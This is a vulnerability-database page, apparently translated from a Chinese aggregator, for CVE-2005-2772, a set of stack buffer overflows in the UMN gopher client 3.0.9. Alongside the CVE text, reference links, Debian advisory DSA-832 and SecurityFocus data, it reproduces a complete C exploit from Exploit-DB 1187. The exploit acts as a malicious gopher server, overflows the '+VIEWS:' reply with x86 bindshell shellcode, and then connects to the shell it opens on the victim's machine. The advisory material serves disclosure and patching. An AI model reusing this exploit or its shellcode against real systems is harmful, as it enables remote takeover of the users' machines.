CVE-2005-2772
CVSS 7.5
Published: 2005-09-02 19:03:00
Last revised: 2016-10-17 23:30:07

[Original] Multiple stack-based buffer overflows in University of Minnesota gopher client 3.0.9 allow remote malicious servers to execute arbitrary code via (1) a long "+VIEWS:" reply, which is not properly handled in the VIfromLine function, and (2) certain arguments when launching third party programs such as a web browser from a web link, which is not properly handled in the FIOgetargv function.


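[CNNVD] UMN Gopher multiple buffer overflow vulnerabilities (CNNVD-200509-004)

        Gopher is a protocol developed by the University of Minnesota. A Gopher server provides ordered browsing of directories and files. Now that the WWW has become familiar to most users, the Gopher service has gradually been abandoned.
        The gopher client version 3.0.9 contains multiple stack-based buffer overflows. They allow a remote malicious server to execute arbitrary code via (1) a long "+VIEWS:" reply (not properly handled in the VIfromLine function), and (2) certain arguments when launching third-party programs such as a web browser from a web link (not properly handled in the FIOgetargv function).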

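- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found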

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2772
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2772
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-004
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=112559902931614&w=2
(UNKNOWN)  BUGTRAQ  20050901 UMN gopher[v3.0.9+] multiple(2) client buffer overflows.
http://www.debian.org/security/2005/dsa-832
(UNKNOWN)  DEBIAN  DSA-832
http://www.kb.cert.org/vuls/id/619812
(VENDOR_ADVISORY)  CERT-VN  VU#619812
http://www.securityfocus.com/bid/14693
(UNKNOWN)  BID  14693
http://xforce.iss.net/xforce/xfdb/22053
(UNKNOWN)  XF  umn-gopher-vifromline-bo(22053)

- Vulnerability information

UMN Gopher multiple buffer overflow vulnerabilities
High risk  Buffer overflow
2005-09-02 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        No data available

- Vulnerability information (1187)

Gopher <= 3.0.9 (+VIEWS) Remote (Client Side) Buffer Overflow Exploit (EDBID:1187)
linux local
2005-08-30 Verified
0 vade79
N/A
/*[ gopher[v3.0.9+]: remote (client) buffer overflow exploit. ]
* 
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
* 
* compile: 
* gcc xgopher-client.c -o xgopher-client 
* 
* syntax: 
* ./xgopher-client <port> [bindshell port] 
* 
* The Internet Gopher Client is based on the UMN 
* Gopher/Gopherd 2.3.1 code. Gopher is an Internet technology 
* that predates the Web. It presents information as a virtual 
* network-wide filesystem. Modern browsers such as Konqueror 
* can display gopherspace as if it contained files on your 
* local machine (trees, drag and drop, etc.), but the 
* difference is that each file or folder in that tree may be 
* on a different machine. 
* 
* this client contains a remotely exploitable buffer overflow 
* in the processing of "+VIEWS:" information, located in 
* SRC/object/VIews.c in the VIfromLine() function. 
* 
* this is a stack overflow that can be exploited immediately 
* upon the client's connection to an untrusted gopher server. 
* while this is a stack overflow, exploitation of this 
* overflow is not completely standard, and special values 
* will be needed for it to work. (see the first three DEFINEs 
* below) 
* 
* i made this simply to be sure it was possible to exploit, 
* tested successfully on mandrake/9.2 with gopher/3.0.9 
* compiled from source. 
***************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* THE FOLLOWING THREE DEFINES WILL BE UNIQUE TO EACH SYSTEM. */

/* this needs to be replaced as a null-byte will overwrite it. this */
/* can be found in gdb using a trial-run of the exploit. */
/* (gdb) break VIfromLine */
/* Breakpoint 1 at 0x805c2e5: file VIews.c, line 231. */
/* (gdb) run server-running-this-exploit.com 70 */
/* ... */
/* Breakpoint 1, VIfromLine (vi=0x8074f08, ... */
/* -----------------------------^^^^^^^^^ */
/* ... */
#define REPLACE_VI_ADDR 0x08074f08

/* where the shellcode is located. you can use a trial-run to get */
/* this as well, run "objdump -s <core> | grep 90909090" on the */
/* core file, and choose something in the middle of all the */
/* 0xbfff???? addresses dumped. */
#define RET_ADDR 0xbfffe910

/* guess time; try between 0-12, not likely to be anything */
/* higher than that. */
#define PLACEMENT_OFFSET 7

/* FROM HERE ON THE DEFINES DO NOT NEED TO BE MODIFIED. */
#define BUFSIZE 500
#define DFL_BINDSHELL_PORT 7979
#define TIMEOUT 10

static char x86_exec[]= /* bindshell, from netric. */
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66"
"\xcd\x80\x31\xd2\x52\x66\x68\xff\xff\x43\x66\x53\x89"
"\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89"
"\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52"
"\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd"
"\x80";

/* prototypes. */
unsigned char *getcode(void);
char *gopherd_bind(unsigned short);
void getshell(char *,unsigned short);
void printe(char *,short);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv){
unsigned short port=0,sport=DFL_BINDSHELL_PORT;
char *hostptr;
printf("[*] gopher[v3.0.9+]: remote (client) buffer overflow exp"
"loit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n");
if(argc<2){
printf("[!] syntax: %s <port> [bindshell port]\n",argv[0]);
exit(1);
}
port=atoi(argv[1]);
if(argc>2)sport=atoi(argv[2]);

/* set the port to bind to in the shellcode. */
x86_exec[20]=(sport&0xff00)>>8;
x86_exec[21]=(sport&0x00ff);

/* verbose values display. */
printf("[*] replacement \"vi\" address\t\t: 0x%.8x\n",REPLACE_VI_ADDR);
printf("[*] return address\t\t\t: 0x%.8x\n",RET_ADDR);
printf("[*] offset from the end of tmpstr[]\t: %d (=%d)\n",
PLACEMENT_OFFSET,PLACEMENT_OFFSET*4);
printf("[*] server port\t\t\t\t: %u\n",port);
printf("[*] bindshell port\t\t\t: %u\n\n",sport);

/* wait for a connection and send overflow. */
hostptr=gopherd_bind(port);

/* be safe, and give it time to run. */
sleep(3);

/* see if a shell spawned. */
getshell(hostptr,sport);

exit(0);
}
/* this is what fills the buffer that will be overflown. (tmpstr[256]) */
unsigned char *getcode(void){
unsigned char *buf;
if(!(buf=(unsigned char *)malloc(BUFSIZE+1)))
printe("getcode(): allocating memory failed.",1);

/* make everything nops, and overwrite where needed. */
memset(buf,0x90,BUFSIZE);

/* this gives more NOP/guessing room. if it hits before the addresses, */
/* it will jump over them to get to the shellcode. (jumps 8 bytes) */
buf[254+(PLACEMENT_OFFSET*4)]=0xeb; /* jump, */
buf[255+(PLACEMENT_OFFSET*4)]=0x08; /* 8. */

/* return address. */
*(long *)&buf[256+(PLACEMENT_OFFSET*4)]=RET_ADDR;

/* the replacement value will be right after the new return address. */
/* (this is needed because a null-byte will corrupt it, and fault */
/* where not desired) */
*(long *)&buf[260+(PLACEMENT_OFFSET*4)]=REPLACE_VI_ADDR;

/* add shellcode to the end of the buffer. */
memcpy(buf+BUFSIZE-strlen(x86_exec),x86_exec,strlen(x86_exec));
return(buf);
}
char *gopherd_bind(unsigned short port){
int ssock=0,sock=0,so=1;
unsigned int salen=0;
char pseudobuf[2];
struct sockaddr_in ssa,sa;
ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
ssa.sin_family=AF_INET;
ssa.sin_port=htons(port);
ssa.sin_addr.s_addr=INADDR_ANY;
printf("[*] awaiting connection from: *:%d.\n",port);
if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
printe("could not bind socket.",1);
listen(ssock,1); 
bzero((char*)&sa,sizeof(struct sockaddr_in));
salen=sizeof(sa);
sock=accept(ssock,(struct sockaddr *)&sa,&salen);
close(ssock);
printf("[*] gopher server connection established.\n");

/* not really needed, but i feel better with it waiting for it. */
printf("[*] waiting for <any> request/data...\n");
read(sock,pseudobuf,1);
printf("[*] received request/data, sending overflow.\n");

/* setup the precursor to cause the overflow. */
write(sock,"+-1\n",4);
write(sock,"+INFO:\t0filler\tfiller\tfiller\tfiller\n",36);
write(sock,"+VIEWS:\t\n ",10);

/* the overflow. */
write(sock,getcode(),BUFSIZE);
write(sock,"\n",1);

sleep(1);
close(sock);
printf("[*] gopher server connection closed.\n");
return(inet_ntoa(sa.sin_addr));
}
void getshell(char *hostname,unsigned short port){
int sock,r;
fd_set fds;
char buf[4096+1];
struct hostent *he;
struct sockaddr_in sa;
printf("[*] checking to see if the exploit was successful.\n");
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
return;
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)
exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)
exit(1);
return;
}

// milw0rm.com [2005-08-30]
		

- Vulnerability information (F40367)

Debian Linux Security Advisory 832-1 (PacketStormID:F40367)
2005-10-04 00:00:00
Debian  security.debian.org
advisory,overflow,protocol
linux,debian
CVE-2005-2772

Debian Security Advisory DSA 832-1 - Several buffer overflows have been discovered in gopher, a text-oriented client for the Gopher Distributed Hypertext protocol, that can be exploited by a malicious Gopher server.


- --------------------------------------------------------------------------
Debian Security Advisory DSA 832-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
September 30th, 2005                    http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : gopher
Vulnerability  : buffer overflows
Problem type   : remote
Debian-specific: no
CVE ID         : CAN-2005-2772

Several buffer overflows have been discovered in gopher, a
text-oriented client for the Gopher Distributed Hypertext protocol,
that can be exploited by a malicious Gopher server.

For the old stable distribution (woody) this problem has been fixed in
version 3.0.3woody4.

For the stable distribution (sarge) this problem has been fixed in
version 3.0.7sarge2.

For the unstable distribution (sid) this problem has been fixed in
version 3.0.11.

We recommend that you upgrade your gopher package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------


Debian GNU/Linux 3.1 alias sarge
- --------------------------------


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>


- Vulnerability information

19082
UMN Gopher +VIEWS: Reply VIfromLine() Function Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-08-30 Unknown
2005-08-30 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

UMN Gopher Client Remote Buffer Overflow Vulnerability
Boundary Condition Error 14693
Yes No
2005-08-30 12:00:00 2009-07-12 05:06:00
Discovery is credited to vade79.

- Affected software versions

University of Minnesota gopherd 3.0.9
University of Minnesota gopherd 3.0.7
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
University of Minnesota gopherd 3.0.5
University of Minnesota gopherd 3.0.4
University of Minnesota gopherd 3.0.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0

- Discussion

Gopher is prone to a remote buffer overflow vulnerability.

The vulnerability presents itself when the client handles a malformed '+VIEWS:' reply from a server.

A remote attacker may gain unauthorized access in the context of the user running the application.

Gopher version 3.0.9 is reported to be affected by this vulnerability; however, other versions may be vulnerable as well.

- Exploit

Exploit code is available:

- Solution

Debian has released advisory DSA 832-1 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.


University of Minnesota gopherd 3.0.3

University of Minnesota gopherd 3.0.7
